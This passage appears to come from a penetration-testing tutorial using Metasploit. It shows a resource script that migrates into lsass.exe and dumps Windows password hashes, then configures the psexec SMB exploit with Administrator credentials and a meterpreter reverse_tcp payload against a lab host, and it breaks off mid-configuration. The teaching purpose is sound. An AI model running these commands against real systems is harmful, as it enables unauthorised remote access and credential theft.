- First, we need to create a file with the commands we want to execute. In this example, we will migrate to the lsass.exe process and dump the Windows hashes:
root@kali:~# cat autoruncmds.rcmigrate -N lsass.exehashdump
- Next, we will use the exploit/windows/smb/psexec exploit module to compromise the target and use AUTORUNSCRIPT to specify the command we want to execute as soon as we receive a new session:
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.216.10RHOST => 192.168.216.10msf exploit(psexec) > set SMBUSER AdministratorSMBUSER => Administratormsf exploit(psexec) > set SMBPASS vagrantSMBPASS => vagrantmsf exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcp ...